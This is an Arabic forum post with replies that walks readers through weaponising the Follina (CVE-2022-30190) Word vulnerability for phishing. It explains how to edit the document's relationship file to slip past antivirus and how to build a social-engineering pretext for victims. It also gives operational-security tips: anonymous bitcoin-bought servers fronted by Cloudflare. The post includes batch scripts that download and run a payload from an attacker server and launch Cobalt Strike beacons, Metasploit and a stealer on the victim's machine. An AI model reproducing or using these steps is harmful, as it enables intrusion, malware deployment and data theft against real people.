شرح ثغرة CVE-2022-30190 (aka) Follina.py واستغلالها

السلام عليكم شباب,

اعذروني جميعا… من وقت إنشاء قناة التليجرام واعلان العودة بالحماية للابد الى الان يادوب الوقت يكفي لكتابة الموضوع… لاكن
لعيون الشباب الي سالت على الثغرة علما انه سهل عملها لاكن للمبتدئين كتبت هذا الموضوع لثغرة تعتبر قوية من بين الثغرات البرايفت 0day الخاصة بالويندوز… لاكن تم نشرها من 10 ايام وحاليا تعتبر public exploit …

( طبعا وقتنا الان مو مثل وقت اول xD )…

المهم شباب قمت بالتنبيه عن الثغرة CVE-2022-30190 في اوجها 30-5-2022 من خلال قناة التليجرام …

لاكن بعض الشباب ما انتبهت لاهميتها الا بعد كم يوم بس ضاجت المواقع الاخبارية باهمية الثغرة وخطورتها كونها تتميز في اكثر من ميزة عن غيرها من الثغرات السابقة مثل CVE-2021-40444 وغيرها.

اولا هناك اكثر من شخص قاموا بكتابة استغلال الثغرة والي تميزوا بنظري هم:

  1. برتوكول (ms-msdt:/) الدعم بمايكروسفت MSDT (Microsoft Windows Support Diagnostic Tool)
  2. جميع برامج الحماية تعطي الاولوية والثقة للاداة. مما يعني انها تتخطى جميع برامج الحماية لانها اساسية لشركة مايكروسفت بحيث تجمع اسباب المشكلة الي تواجه المستخدمين وترسلها للشركة…
  3. ريموت RCE ( تستطيع كتابة وتحميل اي امر بشكل مباشرة من اللوحة السوداء ).
  4. تشغيل الثغرة من خلال سحب الصفحة فقط! مثال.

حاليا بعد مرور 10 ايام اغلب شركات الحماية قامت بوضع الثغرة في القائمة السوداء بناءا على 3 عناصر اساسية لتحديدها ومنعها من الاختراق … مما يعني انها راح تكون مكشوفة ولاتصلح لارسالها للاختراق.

هناك عناصر الاساسية لكشف الثغرة وهي اول شي القالب الداخلي (exploit.html.tpl) للصفحة وملف التعريف ( document.xml.rels ) لملف الوورد وصفحة الاختراق (exploit.html) وهناك بعض العناصر الداخلية مطلوبة مثل location.href والي هي مسؤولة عن تحديد او تحويل الاتصال للخارج.

وفي صفحة HTML الخاصة للاختراق او الphishing يكون بروتوكول ms-msdt:/ ( مع الانتباه للشرطه في اخر البروتوكول ) من ضمن الحمولة المطلوبة لإكمال عملية الاختراق والمسؤول عنها هو location.href الخاص بالتحويل او تحديد الحمولة من خلاله.

طبعا هذه الملفات داخل ملف الوورد … كل الي عليك تفك ضغط الملف من خلال اي برنامج فك ضغط

extract exploit.docx ---> extracted files --> compress files to exploit.docx through zip

بعد فحص الثغرة والتاكد من كيفية عملها الملف المسؤول عن كشف برامج الحماية للملف هو (document.xml.rels) كما ذكرت سابقا… داخل ملف (word/_rels) مكانه…

ولاجل تعديله كل الي عليك تسوي ملف وورد جديد… وكتابة السيناريو الجميل الي بتقنع فيه العميل بموضوعك ههههه…

طبعا بعد كتابة الفاتورة او الدعوة الخاصة بعميلك وحفظ ملف الوورد, فك الضغط لملف الوورد والقالب الخاص بك راح يكون داخل الملف word/_rels وهو document.xml.rels.

طبعا كيفية عمل الثغرة هناك طريقتين…

  1. تعديل الملف يدوي من خلال الشرح هنا. والميزه هنا انه طبعا راح تتخطى برامج الحماية.

  2. الثاني والي بصراحه اشوفه مناسب لجميع المبتدئين للعمل عليها من حيث ارسال واستقبال الحمولة ( shell connect ) وهي ( استضافة موقع وهمي من خلال Spring Framework ).

بصراحه الطريقة الاولى والثانية مو محتاجه شرح,فقط ركز على العناصر الرئيسية الي حددتها وهي كفيله بتخطي برامج الحماية… طبعا مع بعض البهارات اللذيذة في الاقناع الرقمي والبعض من التفكير الرقمي :slight_smile:

رابط الريبو للطريقة الثانية :

https://github.com/DerZiad/CVE-2022-30190

الشرح سهل جدا ومشروح هناك… لاكن بشكل عام يلزمك سيرفر صغير لاستقبال الحمولات عليه, وبالطبع مابدي اذكر بعض الشباب وبالاخص الجداد ان يقوموا بشراء السيرفر عن طريق البتكوين ! وعدم وضع اي معلومات صحيحة عنك لانه اولا السيرفر خاص للاختراق phishing وثانيا حماية لك وثالثا والنصيحه المهمة هنا انه يتم استخدام دومين (نطاق) للphishing وربطه بالكلاودفلير لعدم كشف الايبي الحقيقي للسيرفر…

كل الي عليك عند استلام سيرفر تنزيل الجافا والspring framework عليه وتنصيب الموقع بثواني من خلال الامر

  1. تنزيل الجافا وسيرفر الspring
# debian or ubuntu and fuck other destro xD 
sudo apt update
apt-get install openjdk-17-jdk maven -y

الشي المهم الان قبل تشغيل السكرب وتكوين ملف الوورد هو ملف الباتش shell.bat

ملف باتش يفتح فقط calc, الكود بالاسفل كتبته للي يحب يفتح او يصطب اكثر من اختراق في باتش واحد… مثل كوبالت سترايك, ميتاسبلويت, ستيلر خاص او اي شي اخر…

هذا الملف ممكن تسميه update ووظيفته لسحب ملفات الاختراق الي استخدمها… ( بعد حذف بعض الاوامر الخاصة :smiley: ) وتشغيل الملفات الي اريد تشغيلها في جهاز الضحية… او العميل إن كان هدفك بزنز :wink:

set update_FILES=http://yourteamserveror.com:8877
curl -o "updates.zip" %update_FILES%/updates.zip
mkdir update
cd update
tar -xf ../updates.zip
start /b dl_update.bat
pause

طبعا مهم جدا هنا امرين.

  1. عدم وضع رابط موقعك او سيرفر هنا, فقط حدد رابط التحميل للملفات الي تبي تستخدمها في الاختراق.
  2. ملف الdl_update.bat مثل ماشرحت سابقا والي بتضم قائمة الملفات الي بتشتغل عند التحميل.
@echo off
start beacon.exe
start metasploit.exe
start stealer.exe

ممكن تضيف في ملف الباتش رسالة تاكيد على عمل الباتش ( لاكن احذفها لاحقا )

start messages.vbs

x = msgbox("b0x exploited ...", 0+16, "r1z")

طبعا الافضل التجربة على جهاز خاص بك بحيث من خلال الشل في الويندوز تفتح ملف الباتش وتتاكد من اليه عمله وتصطيب جميع الملفات الي بدك اياها على جهاز الضحية.

عند التاكد شغل السيرفر

mvn spring-boot:run

عند إنتهاء التشغيل افتح رابط تكويل ملف الوورد بحسب اسم موقعك طبعا او الايبي الخاص بسيرفرك مع البورت 5656 ولاتنسى اضافة anunnaki (اسم المبرمج للاداه) بعد البورت… راح اقوم بتحديث ملفات البرنامج لاحقا بحيث يصير يفتح على اسم رابط ثاني…

مثال:
http://localhost:5656/anunnaki

عند اكتمال التكوين لملف الوورد راح تشوفه على نفس مسار الملفات للبرنامج باسم Anunnaki.doc … كل الي عليك تغيير اسم الملف للاسم الي تبيه ومن ثم ارساله للضحية او عميلك بطريقتك الخاصة.

لتجربة الملف بدون تعديل راح يظهر لك الالة الحاسبة فقط بالشكل هذا:

بالتوفيق!
تحياتي

شكرا على الشرح ,

هل توجد طريقة لتشغيله على السيرفرات , يعنى ينشىء اتصال مع اي سيرفر ويندوز . عن طريق الفتح اون لاين
مثال سيرفر outlook exchange او سيرفر منصب برنامج driver بتم تشغيله اون لاين وينشىء اتصال مباشر مع السيرفر ,؟
يعنى ليس اختراق الاشخاص بل السيرفرات اللى يكون منصب برنامج اوفيس

هلا،

ياريت توضح هدف الاتصال بالسيرفرات ؟ البرنامج يفتح بورت ٥٦٥٦ … يعني لو في اباتشي عبورت ٨٠ او ٤٤٣ ماياثر… تقدر تفتح اتصال بس يكون معك صلاحيات يوزر اداري عالنظام.

الله يبارك فيكم استمرو ارجوكم

الله يبارك فيك